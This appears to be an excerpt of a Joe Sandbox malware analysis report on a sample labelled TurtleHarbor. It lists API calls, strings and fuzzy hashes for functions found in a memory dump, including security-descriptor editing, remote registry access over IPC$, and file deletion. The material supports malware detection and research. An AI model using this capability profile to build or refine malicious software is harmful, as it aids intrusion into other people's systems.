GlobalUnlock.KERNEL32(00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C118
CloseHandle.KERNEL32(00000000,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0039982C,?,?,00000000,?), ref: 0039C130
OleLoadPicture.OLEAUT32(?,00000000,00000000,003A3C7C,?), ref: 0039C149
GlobalFree.KERNEL32(00000000), ref: 0039C159
GetObjectW.GDI32(00000000,00000018,?), ref: 0039C17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0039C1A8
DeleteObject.GDI32(00000000), ref: 0039C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0039C1E6

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 7ac8346015b7b19ccd47afe3dc2dbc52ff2e50ebc707524beadbb4f4388924b5
Instruction ID: 33c1a94595372df6ee24b24b7ccbab5cf6c6add4aa2f98d97f5cee9508b2a4d9
Opcode Fuzzy Hash: 7ac8346015b7b19ccd47afe3dc2dbc52ff2e50ebc707524beadbb4f4388924b5
Instruction Fuzzy Hash: 16411975640208EFDB269F65DC88EAABBBDEF8A711F104058F906E72A0D7319D41DB60

Function 0037DEDC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0037E053
_wcscat.LIBCMT ref: 0037E06B
_wcscat.LIBCMT ref: 0037E07D
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0037E092
SetCurrentDirectoryW.KERNEL32(?), ref: 0037E0A6
GetFileAttributesW.KERNEL32(?), ref: 0037E0BE
SetFileAttributesW.KERNEL32(?,00000000), ref: 0037E0D8
SetCurrentDirectoryW.KERNEL32(?), ref: 0037E0EA

Strings

*.*, xrefs: 0037E129

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 3bc117601294aa320389ce5a7f924eba4037a5696729471d48efb3c5bf00a704
Instruction ID: b12469b4e72bc2c7d1c51dbf8b4e95426a36205ecef6e2986e28e38a510ead57
Opcode Fuzzy Hash: 3bc117601294aa320389ce5a7f924eba4037a5696729471d48efb3c5bf00a704
Instruction Fuzzy Hash: EE8171715042419FCB36EF64C88596AB7E8EF99310F19C82EF48EDB251E738E944CB52

Function 0039C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0039C8A4
GetFocus.USER32 ref: 0039C8B4
GetDlgCtrlID.USER32(00000000), ref: 0039C8BF
_memset.LIBCMT ref: 0039C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0039CA15
GetMenuItemCount.USER32(?), ref: 0039CA35
GetMenuItemID.USER32(?,00000000), ref: 0039CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0039CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0039CAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0039CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0039CB31

Strings

0, xrefs: 0039C9E2

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: cd2b61548cae6fe9679b152fe167e2b13dcde650f1c02973e1086ea693eb4c84
Instruction ID: 4dfb8594d9f4af2391708f5bdfcb602fb43c9818f1f76237fad58ec1c207fb86
Opcode Fuzzy Hash: cd2b61548cae6fe9679b152fe167e2b13dcde650f1c02973e1086ea693eb4c84
Instruction Fuzzy Hash: 9381B971618301AFDB16CF14D885AABBBE8FF89314F01492EF995A7291D730D905CBA2

Function 00368ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00368E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00368E3C
Part of subcall function 00368E20: GetLastError.KERNEL32(?,00368900,?,?,?), ref: 00368E46
Part of subcall function 00368E20: GetProcessHeap.KERNEL32(00000008,?,?,00368900,?,?,?), ref: 00368E55
Part of subcall function 00368E20: HeapAlloc.KERNEL32(00000000,?,00368900,?,?,?), ref: 00368E5C
Part of subcall function 00368E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00368E73

Part of subcall function 00368EBD: GetProcessHeap.KERNEL32(00000008,00368916,00000000,00000000,?,00368916,?), ref: 00368EC9
Part of subcall function 00368EBD: HeapAlloc.KERNEL32(00000000,?,00368916,?), ref: 00368ED0
Part of subcall function 00368EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00368916,?), ref: 00368EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00368B2E
_memset.LIBCMT ref: 00368B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00368B62
GetLengthSid.ADVAPI32(?), ref: 00368B73
GetAce.ADVAPI32(?,00000000,?), ref: 00368BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00368BCC
GetLengthSid.ADVAPI32(?), ref: 00368BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00368BF8
HeapAlloc.KERNEL32(00000000), ref: 00368BFF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00368C20
CopySid.ADVAPI32(00000000), ref: 00368C27
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00368C58
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00368C7E
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00368C92

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 0e9b2f43f671e1af9b999e769cbaac0ecd6b78614dc24d4007ba9166efe77aaa
Instruction ID: 2e3733cc576f19a791f87ee20a6f13b38ca37da8b43d364c60b49b06a53b770c
Opcode Fuzzy Hash: 0e9b2f43f671e1af9b999e769cbaac0ecd6b78614dc24d4007ba9166efe77aaa
Instruction Fuzzy Hash: 8C616975900209AFDF16DFA4DC44EEEBB79FF09300F048269F915AB294DB759A05CB60

Function 00387A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00387A79
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00387A85
CreateCompatibleDC.GDI32(?), ref: 00387A91
SelectObject.GDI32(00000000,?), ref: 00387A9E
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00387AF2
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00387B2E
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00387B52
SelectObject.GDI32(00000006,?), ref: 00387B5A
DeleteObject.GDI32(?), ref: 00387B63
DeleteDC.GDI32(00000006), ref: 00387B6A
ReleaseDC.USER32(00000000,?), ref: 00387B75

Strings

(, xrefs: 00387AFA

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: a0c353775a0401716b5533617fbdd53c532b09487940ac7a7de2df2c4b9a9fce
Instruction ID: 3fd0b552bd3b73d9a31d488a146fe3b253d3c95119a4d54019dcb2fbba6fb4f0
Opcode Fuzzy Hash: a0c353775a0401716b5533617fbdd53c532b09487940ac7a7de2df2c4b9a9fce
Instruction Fuzzy Hash: 61514A71904309EFCB1ADFA8CC85EAEBBB9EF49310F14845DF94AA7210D735A941CB60

Function 0037A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0037A4D4

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

LoadStringW.USER32(?,?,00000FFF,?), ref: 0037A4F6
__swprintf.LIBCMT ref: 0037A54F
__swprintf.LIBCMT ref: 0037A568
_wprintf.LIBCMT ref: 0037A61E
_wprintf.LIBCMT ref: 0037A63C

Strings

^ ERROR, xrefs: 0037A5C0
Error: , xrefs: 0037A5E6
"%s" (%d) : ==> %s:%s%s, xrefs: 0037A619
"%s" (%d) : ==> %s:, xrefs: 0037A637
Line %d (File "%s"):, xrefs: 0037A549, 0037A562

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-2391861430
Opcode ID: 91617bfd6e29348b272726077d31d29ae9f353d02979ad1eff5b72db725165fd
Instruction ID: be12a2315d5eb85ff3c6c1932829ea6f81d25fa3a2c598c0c5af1dfefe072dbe
Opcode Fuzzy Hash: 91617bfd6e29348b272726077d31d29ae9f353d02979ad1eff5b72db725165fd
Instruction Fuzzy Hash: DD51A371801529AACF27EBE0DE86EEEB779EF14340F104165F505B60A2EB352F58CB91

Function 00379710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0037951A: __time64.LIBCMT ref: 00379524

Part of subcall function 00324A8C: _fseek.LIBCMT ref: 00324AA4

__wsplitpath.LIBCMT ref: 003797EF

Part of subcall function 0033431E: __wsplitpath_helper.LIBCMT ref: 0033435E

_wcscpy.LIBCMT ref: 00379802
_wcscat.LIBCMT ref: 00379815
__wsplitpath.LIBCMT ref: 0037983A
_wcscat.LIBCMT ref: 00379850
_wcscat.LIBCMT ref: 00379863

Part of subcall function 00379560: _memmove.LIBCMT ref: 00379599
Part of subcall function 00379560: _memmove.LIBCMT ref: 003795A8

_wcscmp.LIBCMT ref: 003797AA

Part of subcall function 00379CF1: _wcscmp.LIBCMT ref: 00379DE1
Part of subcall function 00379CF1: _wcscmp.LIBCMT ref: 00379DF4

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00379A0D
_wcsncpy.LIBCMT ref: 00379A80
DeleteFileW.KERNEL32(?,?), ref: 00379AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00379ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00379ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00379AEF

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 47aedf310944facc4d8ecad6fb56967ea39f54bc5799c0805c7d80687cf86a4b
Instruction ID: 2cbad54f8381c05c978e7d31b9cf2bbb4afd83fa3a74e602bb57d6650d859af0
Opcode Fuzzy Hash: 47aedf310944facc4d8ecad6fb56967ea39f54bc5799c0805c7d80687cf86a4b
Instruction Fuzzy Hash: 9BC12FB1D00129AADF22DF95CC85EDEB7BDEF45310F0081AAF609EB151EB349A448F65

Function 00325BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00325BF1
GetMenuItemCount.USER32(003D7890), ref: 00360E7B
GetMenuItemCount.USER32(003D7890), ref: 00360F2B
GetCursorPos.USER32(?), ref: 00360F6F
SetForegroundWindow.USER32(00000000), ref: 00360F78
TrackPopupMenuEx.USER32(003D7890,00000000,?,00000000,00000000,00000000), ref: 00360F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00360F97

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: d91060329dcdcfa06a21468096e99d0bf6bee4ea98543108c5cf5cfe7d433fb7
Instruction ID: f566866499a877d84dc759fe44354ff9b2be55adb549f3d443c3a301045f1a41
Opcode Fuzzy Hash: d91060329dcdcfa06a21468096e99d0bf6bee4ea98543108c5cf5cfe7d433fb7
Instruction Fuzzy Hash: EE712730644725BFEB2A8B54DC86FABBF68FF05764F108206F514AA1E0D7B16860DB90

Function 0037AEEA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,003A0980), ref: 0037AF4E
GetDriveTypeW.KERNEL32(00000061,003CB5F0,00000061), ref: 0037B018
_wcscpy.LIBCMT ref: 0037B042

Strings

L,:, xrefs: 0037B03A
removable, xrefs: 0037AF80
unknown, xrefs: 0037AFD9
cdrom, xrefs: 0037AF6A
fixed, xrefs: 0037AF96
all, xrefs: 0037AF54
network, xrefs: 0037AFAC
ramdisk, xrefs: 0037AFC2

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: L,:$all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-460166681
Opcode ID: 9f8412bb8e7f4cc813fbc7a5b5a38a16d61e0e88dc8d9b9f822bb4ee09fd9c31
Instruction ID: a2f36b9d186ce4de26320567f71edc8447b571cf4c8bff09fd2e60d8b36f9e35
Opcode Fuzzy Hash: 9f8412bb8e7f4cc813fbc7a5b5a38a16d61e0e88dc8d9b9f822bb4ee09fd9c31
Instruction Fuzzy Hash: B951AF701083059BC32AEF14DC92AAFB7A9EF95700F50881DF4999B2A2DB319D49CB43

Function 003683FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

_memset.LIBCMT ref: 00368489
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003684BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003684DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003684F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00368520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00368548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00368553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00368558

Strings

SOFTWARE\Classes\, xrefs: 0036842A
\IPC$, xrefs: 003684A0
\CLSID, xrefs: 00368440

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 3f43b6ac21d2909ff7afd89004ed273f2f638b2ad2490fbfcd13a3fface12213
Instruction ID: 635d58870d88fc3e8575351d21459e5de4f5b04e44f928e1181a3e04dc1bfb8d
Opcode Fuzzy Hash: 3f43b6ac21d2909ff7afd89004ed273f2f638b2ad2490fbfcd13a3fface12213
Instruction Fuzzy Hash: 2A410676C1022DABCF16EBA4ED95DEEB778FF18340F004529E905A6161EB309E04CB90

Function 0039147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039040D,?,?), ref: 00391491

Strings

HKEY_USERS, xrefs: 00391592
HKEY_CURRENT_CONFIG, xrefs: 0039154E
HKCR, xrefs: 00391539
HKU, xrefs: 003915A3
HKLM, xrefs: 0039150F
HKEY_LOCAL_MACHINE, xrefs: 003914FA
HKEY_CURRENT_USER, xrefs: 00391570
HKEY_CLASSES_ROOT, xrefs: 00391524
HKCU, xrefs: 00391581
HKCC, xrefs: 0039155F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: bd61602793bae95112d7dbb9c7345bb5becd305eca9315d59c4e7fa74c6dfeb2
Instruction ID: 590aef0d6a2b311605726d8263617030c325585cd8c376467042d58469daefb5
Opcode Fuzzy Hash: bd61602793bae95112d7dbb9c7345bb5becd305eca9315d59c4e7fa74c6dfeb2
Instruction Fuzzy Hash: 5B417C3451026ADBDF1BEF50D991AEB3364BF62300F524419FC56AB292DB30ED19CB60

Function 0036FF5C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0035FB41,00000010,?,Bad directive syntax error,003A0980,00000000,?,?,?), ref: 0036FF7D
LoadStringW.USER32(00000000,?,0035FB41,00000010), ref: 0036FF84

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

_wprintf.LIBCMT ref: 0036FFB7
__swprintf.LIBCMT ref: 0036FFD9
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00370048

Strings

., xrefs: 0037002E
%s (%d) : ==> %s.: %s %s, xrefs: 0036FFB2
Error: , xrefs: 00370016
Line %d:, xrefs: 0036FFD3
Line %d (File "%s"):, xrefs: 0036FFEE

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 519b12e2c6f75d6b261cee3224a137243bd803118879943803b8b9f8e99bf0c3
Instruction ID: 71bcc985129b0d202a165df8f5ea50fe63fc14284b13144351ba794b8ad26346
Opcode Fuzzy Hash: 519b12e2c6f75d6b261cee3224a137243bd803118879943803b8b9f8e99bf0c3
Instruction Fuzzy Hash: AB21813184022DABCF13AF90DC06FEE7779BF24304F044459F505AA0A2DB71AA68CB91

Function 00375882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

Part of subcall function 0032153B: _memmove.LIBCMT ref: 003215C4

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003758EB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00375901
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00375912
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00375924
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00375935

Strings

play PlayMe wait, xrefs: 0037591F
play PlayMe, xrefs: 00375930
alias PlayMe, xrefs: 003758C4
close PlayMe, xrefs: 003758FC, 00375929
status PlayMe mode, xrefs: 003758E6
open , xrefs: 0037589A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 42c98c8f2beca2d195e71fd2847d59c844ed7da1a4ea85880f2d67cebdc8bc97
Instruction ID: 21572ce631c95c67420786eef1478ec814a34adc61a2a5c4c20df61f0067ee1a
Opcode Fuzzy Hash: 42c98c8f2beca2d195e71fd2847d59c844ed7da1a4ea85880f2d67cebdc8bc97
Instruction Fuzzy Hash: C011B23598016DB9D726A7A1DC4AEFFBB7CEBF6B50F400429B805E60D1DBA01D04CAA0

Function 00374C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00374C27
gethostname.WSOCK32(?,00000100), ref: 00374C41
gethostbyname.WSOCK32(?), ref: 00374C4E
_wcscpy.LIBCMT ref: 00374C76
_memmove.LIBCMT ref: 00374C89
inet_ntoa.WSOCK32(?), ref: 00374C94
_strcat.LIBCMT ref: 00374CA2
